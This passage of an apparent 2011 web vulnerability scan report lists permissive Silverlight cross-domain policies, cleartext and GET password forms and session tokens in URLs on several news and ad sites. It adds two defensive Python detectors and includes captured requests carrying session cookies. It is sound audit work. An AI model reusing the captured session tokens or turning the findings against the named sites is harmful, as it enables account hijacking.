Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:30:29 GMT
Date: Thu, 12 May 2011 13:30:29 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.5. http://cdn.eyewonder.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "a683d7574fd1ca1:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 13:30:36 GMT
Last-Modified: Thu, 01 Apr 2010 03:56:43 GMT
Expires: Thu, 12 May 2011 14:30:33 GMT
Content-Length: 268
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="http://*"/></allow-from><grant-to><resource path="/" include-subpath
...[SNIP]...

5. Cleartext submission of password
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://crenk.com/buy-chromebook/

Summary

Severity:   High
Confidence:   Certain
Host:   http://crenk.com
Path:   /buy-chromebook/

Issue detail

The page contains a form whose action URL, shown in the response excerpt below, is submitted over clear-text HTTP. The form contains the password field shown below.

Request

GET /buy-chromebook/ HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 13:28:15 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; path=/
Last-Modified: Thu, 12 May 2011 10:10:43 +0000
Content-Length: 32569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</p>

       <form name="login-form" id="sidebar-login-form" class="standard-form" action="http://crenk.com/wp-login.php" method="post">
           <label>
...[SNIP]...
<br />
           <input type="password" name="pwd" id="sidebar-user-pass" class="input" value="" tabindex="98" /></label>
...[SNIP]...

5.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The page contains a form whose action URL, shown in the response excerpt below, is submitted over clear-text HTTP. The form contains the password field shown below.

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</p>

       <form action="/comments/post/" method="post" class="submit_form default_form submit_comment_form">
           

                                       <p>
...[SNIP]...
</span><input type="password" name="password" id="id_password" /></label>
...[SNIP]...

5.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The page contains a form whose action URL, shown in the response excerpt below, is submitted over clear-text HTTP. The form contains the password field shown below.

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<div class="submit_form_alerts_global">
                           <form action="/accounts/login/?next=/news/2011/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">                    
                               <div class="global_login_container_left">
...[SNIP]...
</label>
                                           
                                           <input id="global_password" class="vPasswordField required" name="password" size="17" value="" maxlength="30" def="" type="password" style="margin-top:12px;"/>
                                           
                                           <span class="global_formtip">
...[SNIP]...

5.4. http://www.pcworld.com/pcworldconnect/comment_registration

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form whose action URL, shown in the response excerpt below, is submitted over clear-text HTTP. The form contains the two password fields shown below.

Request

POST /pcworldconnect/comment_registration HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 111

callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A582A284CD97C03D88D1B381CBB00A78; Path=/
Vary: Accept-Encoding
Content-Length: 6223


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...

6. Session token in URL
There are 4 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
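Deciding whether a URL parameter is a session token is a heuristic, which is why the findings below are rated Firm rather than Certain. The following Python is an added example, not Burp Suite or Hoyt LLC code; it applies a name match plus a value-shape check to the request URL from 6.1, an abbreviated version of the one from 6.4, the link captured in 6.3, and one constructed PHPSESSID URL, and runs the same check over the link targets in a response body.

```python
"""Flag query parameters that look like session tokens, in a request URL
or in the links of a response body, and rate the confidence the way a
scanner would.

Added example for this report, not Burp Suite code. Sample URLs are the
request URL from 6.1 and an abbreviated form of the one from 6.4; the HTML
fragment is the link captured in 6.3; the PHPSESSID URL is constructed."""
import html
import re
from urllib.parse import parse_qsl, urlsplit

# parameter names that commonly carry a session identifier
TOKEN_NAME = re.compile(r"sess|(^|_)sid($|_)|token|auth|ticket", re.I)
MILLIS_TIMESTAMP = re.compile(r"\d{13}(\.\d+)?")


def rate(value: str):
    """Return 'Firm', 'Tentative' or None (not a token) for a parameter value
    whose *name* already matched TOKEN_NAME."""
    if "://" in value:
        return None            # a callback URL, not a secret (e.g. token_url=http://...)
    if MILLIS_TIMESTAMP.fullmatch(value):
        return "Tentative"     # millisecond timestamp, typical of analytics beacons
    if len(value) < 8:
        return "Tentative"     # too short to be an unguessable token
    return "Firm"


def find_session_tokens_in_url(url: str) -> list:
    """(name, value, confidence) for each token-looking parameter in url."""
    out = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if not value or not TOKEN_NAME.search(name):
            continue
        confidence = rate(value)
        if confidence:
            out.append((name, value, confidence))
    return out


LINK_ATTR = re.compile(r"""(?:href|src|action)\s*=\s*["']([^"']+)["']""", re.I)


def find_session_tokens_in_html(body: str) -> list:
    """Same check over every link target in a response body (the 6.3 case).
    Each hit is (link, name, value, confidence)."""
    out = []
    for raw in LINK_ATTR.findall(body):
        link = html.unescape(raw)
        for name, value, confidence in find_session_tokens_in_url(link):
            out.append((link, name, value, confidence))
    return out


# Request URL from 6.1.
SHARETHIS_URL = ("http://l.sharethis.com/pview?event=pview&publisher=f06dc602-68df-478f-8a38-f177716586cf"
                 "&hostname=mashable.com&location=%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F"
                 "&url=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F"
                 "&sessionID=1305206945034.27371&fpc=6f9c964-12fe465750b-2748d999-1&ts1305206987382.0"
                 "&r_sessionID=&hash_flag=&shr=&count=1")
# Abbreviated: the real request in 6.4 carries several more callback URLs.
FACEBOOK_URL = ("http://www.facebook.com/extern/login_status.php?api_key=116628718381794"
                "&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1"
                "&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1"
                "&sdk=joey&session_version=3")
# Link captured in the 6.3 response.
COURIERPRESS_HTML = ('<a class="rpxnow" onclick="return false;" href="https://login.courierpress.com/openid/v2/signin'
                     '?token_url=http%3A%2F%2Fwww.courierpress.com%2Faccounts%2Fauth%2F?previous=/news/2011/may/12/heder-here-in-this-spp-ppppp/">'
                     'Register or log in using your account on these websites.</a>')
# Constructed positive case.
PHPSESSID_URL = "http://shop.example.test/cart?PHPSESSID=0b2dbe7a4c1e4f5a9d3c&item=42"

if __name__ == "__main__":
    for u in (SHARETHIS_URL, FACEBOOK_URL, PHPSESSID_URL):
        print(urlsplit(u).netloc, find_session_tokens_in_url(u))
    print("6.3 link:", find_session_tokens_in_html(COURIERPRESS_HTML))
```

Run against the four samples, only the constructed PHPSESSID case rates Firm: the sharethis sessionID is a millisecond timestamp, session_version is a single digit, and the callback parameters (no_session, ok_session and the 6.3 token_url) carry URLs rather than secrets, so the value check drops them before they can be reported. A name match alone would have flagged all of them, which is the gap between a scanner's Firm rating and a confirmed finding.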


6.1. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=f06dc602-68df-478f-8a38-f177716586cf&hostname=mashable.com&location=%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&url=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&sessionID=1305206945034.27371&fpc=6f9c964-12fe465750b-2748d999-1&ts1305206987382.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 12 May 2011 13:31:35 GMT
Connection: keep-alive


6.2. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /ps/ifr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ps/ifr?container=friendconnect&mid=1&nocache=0&view=profile&parent=http%3A%2F%2Forangeorb.blogspot.com%2F&url=http%3A%2F%2Fwww.google.com%2Ffriendconnect%2Fgadgets%2Fmembers.xml&communityId=09528749658452737714&caller=http%3A%2F%2Forangeorb.blogspot.com%2F2011%2F05%2Fplanets-align-on-friday-13th-and.html&rpctoken=1027267470&locale=en_US HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html#st=e%3DAOG8GaDDe54RCyTIdvRBkQ39yp9qA3IJeoHmEAvOV4H1f8Ot8jM7xfdyT0cI4mYEVWgV47OzwlcOMaXNDlmDu2SeV5zRCqmd0EaWjnFj535lHWXDnTPNQ8FjgUZHb6z3L%252FYmzyXeJLyT7%252B3k7Wii71rrIOzy4f6Wx5%252BUWOML6a9DmcAmUrtRqmE2%252BD3yjSKo6iaczxQ6FH3XrmW43XIOCCkNgi%252F2FUhYjmc5tAAOHqezojB46Oa5l8pNRatx2K9yceCfORyS%252F%252BKQyZIyazwECyM3Nz1c%252B2o49WcygQ5DpubP1gco08c6sMg%253D%26c%3Dpeoplesense&rpctoken=1027267470&
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:32:50 GMT
Expires: Thu, 12 May 2011 13:32:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 1015

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-o
...[SNIP]...

6.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<span class="global_rpx_login_text"><a class="rpxnow" onclick="return false;" href="https://login.courierpress.com/openid/v2/signin?token_url=http%3A%2F%2Fwww.courierpress.com%2Faccounts%2Fauth%2F?previous=/news/2011/may/12/heder-here-in-this-spp-ppppp/">Register or log in using your account on these websites.</a>
...[SNIP]...

6.4. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=116628718381794&app_id=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2f44d4d1%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfbcf69398%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df9a216678%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df324a3981c%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df5c90ca8c%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f324a3981c&origin=http%3A%2F%2Fmashable.com%2Ff7ed6dd3c&relation=parent&transport=postmessage&frame=f36ad9bf08
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.63.106
X-Cnection: close
Date: Thu, 12 May 2011 13:28:41 GMT
Content-Length: 0


7. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form whose action URL, shown in the response excerpt below, is submitted using the GET method: the form tag carries no method attribute, so the browser default of GET applies. The form contains the two password fields shown below.

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
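The checks in sections 5 and 7 come down to the same inspection of each password-carrying form: where its action resolves to (a relative action inherits the scheme of the page) and which method it uses, with a missing method attribute meaning GET. The following Python is an added example, not code from Burp Suite or Hoyt LLC; the sample page is constructed from the form fragments captured in 5.1, 5.2 and 5.4 and placed on a hypothetical http://example.test/ page, with one HTTPS POST form added for contrast.

```python
"""Find forms that carry a password field and check how they submit it:
over clear-text HTTP (section 5) or with the GET method (section 7).

Added example for this report, not Burp Suite code. The sample page is
constructed from the form fragments captured in 5.1, 5.2 and 5.4, plus one
correctly configured form for contrast."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect every <form> with its resolved action, effective method and
    the names of its type="password" inputs."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {
                # a relative or missing action resolves against the page URL
                "action": urljoin(self.page_url, a.get("action", "")),
                # HTML default: a form with no method attribute submits via GET
                "method": a.get("method", "GET").upper() or "GET",
                "password_fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None \
                and a.get("type", "").lower() == "password":
            self._current["password_fields"].append(a.get("name") or a.get("id") or "(unnamed)")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_password_forms(page_url: str, html: str) -> list:
    """Return one finding per password-carrying form that is misconfigured.
    Forms without a password field, and HTTPS POST forms, produce nothing."""
    collector = FormCollector(page_url)
    collector.feed(html)
    collector.close()
    findings = []
    for form in collector.forms:
        if not form["password_fields"]:
            continue
        issues = []
        if urlsplit(form["action"]).scheme != "https":
            issues.append("Cleartext submission of password")
        if form["method"] != "POST":
            issues.append("Password field submitted using GET method")
        if issues:
            findings.append({"action": form["action"], "method": form["method"],
                             "fields": form["password_fields"], "issues": issues})
    return findings


# Constructed page: fragments from 5.1 (crenk.com), 5.2 (courierpress) and
# 5.4 (pcworld), served from a hypothetical http://example.test/ page, plus
# an HTTPS POST form and a non-password form that should produce no finding.
SAMPLE_PAGE_URL = "http://example.test/article/"
SAMPLE_HTML = """
<form name="login-form" id="sidebar-login-form" action="http://crenk.com/wp-login.php" method="post">
  <input type="password" name="pwd" id="sidebar-user-pass" class="input" value="" />
</form>
<form action="/comments/post/" method="post" class="submit_form">
  <input type="password" name="password" id="id_password" />
</form>
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm">
  <input type="hidden" id="init" name="init" value="inited" />
  <input type="password" name="password" class="formField" value="">
  <input type="password" name="confirm" class="formField" value="">
</form>
<form action="https://login.example.test/signin" method="post">
  <input type="password" name="password">
</form>
<form action="/search" method="get"><input type="text" name="q"></form>
"""

if __name__ == "__main__":
    for finding in audit_password_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(finding["method"], finding["action"], finding["fields"])
        for issue in finding["issues"]:
            print("   -", issue)
```

The pcworld fragment is the one that trips both checks: its action is relative, so it inherits the page's http scheme, and it has no method attribute, so the browser submits the password and confirm fields in the query string. Note that the HTML alone cannot tell you whether the session cookie has the secure flag, the other half of the remediation above; that needs the Set-Cookie headers.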

Request

POST /pcworldconnect/comment_registration HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 111

callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A582A284CD97C03D88D1B381CBB00A78; Path=/
Vary: Accept-Encoding
Content-Length: 6223


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...

8. Cookie scoped to parent domain
There are 84 instances of this issue:

Issue background

